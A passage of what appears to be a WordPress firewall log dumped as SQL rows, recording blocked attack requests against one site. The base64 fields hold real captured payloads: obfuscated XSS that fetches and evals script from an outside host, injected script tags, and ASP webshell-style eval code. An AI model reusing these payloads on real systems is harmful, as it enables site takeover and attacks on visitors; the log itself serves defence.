9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9zdGF0aWNzL2ltYWdlcy9jYWNoZS5hc3A=\",\"category\":\"sqli\",\"ssl\":0}'),(37848,1569950003.497787,1569950002.232000,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37849,1569950001.042693,1569949999.494300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?page=yuzo-related-post',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Related Posts <= 5.12.90 - Missing Authentication','{\"learningMode\":0,\"failedRules\":\"137\",\"paramKey\":\"cmVxdWVzdC5ib2R5W25hbWVfb3B0aW9uc10=\",\"paramValue\":\"eXV6b19yZWxhdGVkX3Bvc3Q=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37705,1569411863.333258,1569411862.440300,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYSovLDk5LypfYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWEpO2lmKF9hYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37706,1569411860.999368,1569411860.111500,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYSA9IF9hYWFhYWFhYWEoX2FhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhKF9hYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYShfYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37847,1569950005.905187,1569950004.343300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37922,1570674669.018199,1570674668.085100,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//kdatebase/index_.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W0NuZTEyM10=\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9rZGF0ZWJhc2UvaW5kZXhfLmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37757,1569949437.865563,1569949436.389400,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?action=wcp_change_post_width',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dpZHRoXQ==\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37708,1569411905.410819,1569411904.540100,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37742,1569530348.084488,1569530347.104000,'\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦°¸',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?action=save_map_name',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W21hcE5hbWVd\",\"paramValue\":\"Ij48c2NyaXB0IHNyYz0naHR0cHM6Ly9iZXMuYmVsYXRlcmJld2FzdGhlcmUuY29tL2Nvcm4vZmxleC5qcz90cD0xJnYyJyB0eXBlPXRleHQvamF2YXNjcmlwdD48L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37753,1569949452.584119,1569949450.938100,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37743,1569530676.338945,1569530675.379000,'\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦°¸',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2VtYWlsXQ==\",\"paramValue\":\"PHN2Zy9vbmxvYWQ9ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDMyLDQwLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMDEsMTA4LDEwMSwxMDksMzIsNjEsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDk5LDExNCwxMDEsOTcsMTE2LDEwMSw2OSwxMDgsMTAxLDEwOSwxMDEsMTEwLDExNiw0MCwzOSwxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDQxLDU5LDMyLDEwLDksMTAxLDEwOCwxMDEsMTA5LDQ2LDExNiwxMjEsMTEyLDEwMSwzMiw2MSwzMiwzOSwxMTYsMTAxLDEyMCwxMTYsNDcsMTA2LDk3LDExOCw5NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDU5LDMyLDEwLDMyLDMyLDMyLDMyLDEwMSwxMDgsMTAxLDEwOSw0NiwxMTUsMTE0LDk5LDMyLDYxLDMyLDM5LDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsOTgsMTAxLDExNSw0Niw5OCwxMDEsMTA4LDk3LDExNiwxMDEsMTE0LDk4LDEwMSwxMTksOTcsMTE1LDExNiwxMDQsMTAxLDExNCwxMDEsNDYsOTksMTExLDEwOSw0Nyw5OSwxMTEsMTE0LDExMCw0NywxMDIsMTA4LDEwMSwxMjAsNDYsMTA2LDExNSw2MywxMTYsMTEyLDYxLDUyLDM5LDU5LDEwLDMyLDMyLDMyLDMyLDEwMCwxMTEsOTksMTE3LDEwOSwxMDEsMTEwLDExNiw0NiwxMDMsMTAxLDExNiw2OSwxMDgsMTAxLDEwOSwxMDEsMTEwLDExNiwxMTUsNjYsMTIxLDg0LDk3LDEwMyw3OCw5NywxMDksMTAxLDQwLDM0LDEwNCwxMDEsOTcsMTAwLDM0LDQxLDkxLDQ4LDkzLDQ2LDk3LDExMiwxMTIsMTAxLDExMCwxMDAsNjcsMTA0LDEwNSwxMDgsMTAwLDQwLDEwMSwxMDgsMTAxLDEwOSw0MSw1OSwxMCwzMiwzMiwxMjUsNDEsNDAsNDEsNTkpKT4+QHRlc3QuY29t\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37737,1569529129.568410,1569529128.635300,'\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦°¸',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?action=save_map_name',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W21hcE5hbWVd\",\"paramValue\":\"Ij48c2NyaXB0IHNyYz0naHR0cHM6Ly9iZXMuYmVsYXRlcmJld2FzdGhlcmUuY29tL2Nvcm4vZmxleC5qcz90cD0xJnYyJyB0eXBlPXRleHQvamF2YXNjcmlwdD48L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37707,1569411907.677184,1569411906.867600,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3RoaW1fdmFsdWVd\",\"paramValue\":\"WDwvc2NyaXB0PjxzY3JpcHQgICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgX2FhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhKi8sMTE2LypfYWFhYWFhYSovLDExNi8qX2FhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWEqLyw1OC8qX2FhYWFhYWEqLyw0Ny8qX2FhYWFhYWEqLyw0Ny8qX2FhYWFhYWEqLywxMDMvKl9hYWFhYWFhKi8sMTA4LypfYWFhYWFhYSovLDk3LypfYWFhYWFhYSovLDExNS8qX2FhYWFhYWEqLywxMTUvKiovLDQ2LypfYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhKi8sMTA4LypfYWFhYWFhYSovLDk3LypfYWFhYWFhYSovLDExNi8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sMTE0LypfYWFhYWFhYSovLDk4LypfYWFhYWFhYSovLDEwMS8qX2FhYWFhYWEqLywxMTkvKiovLDk3LypfYWFhYWFhYSovLDExNS8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTA0LypfYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYSovLDEwMS8qX2FhYWFhYWEqLyw0Ni8qX2FhYWFhYWEqLyw5OS8qX2FhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWEqLyw0Ny8qKi8sMTA4LypfYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhKi8sOTcvKl9hYWFhYWFhKi8sMTA4LyoqLyw0Ny8qKi8sOTkvKl9hYWFhYWFhKi8sMTA4LypfYWFhYWFhYSovLDEwMS8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTQvKl9hYWFhYWFhKi8sNDYvKl9hYWFhYWFhKi8sMTA2LypfYWFhYWFhYSovLDExNS8qX2FhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhID0gX2FhYWFhYWEoX2FhYWFhYWEpO2lmKF9hYWFhYWFhLmxlbmd0aCA+IDMpe19hYWFhYWFhKF9hYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhKF9hYWFhYWFhKXsgdmFyIF9hYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWEub3BlbiggU3RyaW5nLmZyb21DaGFyQ29kZSg3MSw2OSw4NCksIF9hYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWEucmVzcG9uc2VUZXh0O31mdW5jdGlvbiBfYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYSgwLDApO308L3NjcmlwdD48c2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37924,1570674831.278608,1570674830.345300,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//plus/mumaasp.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL 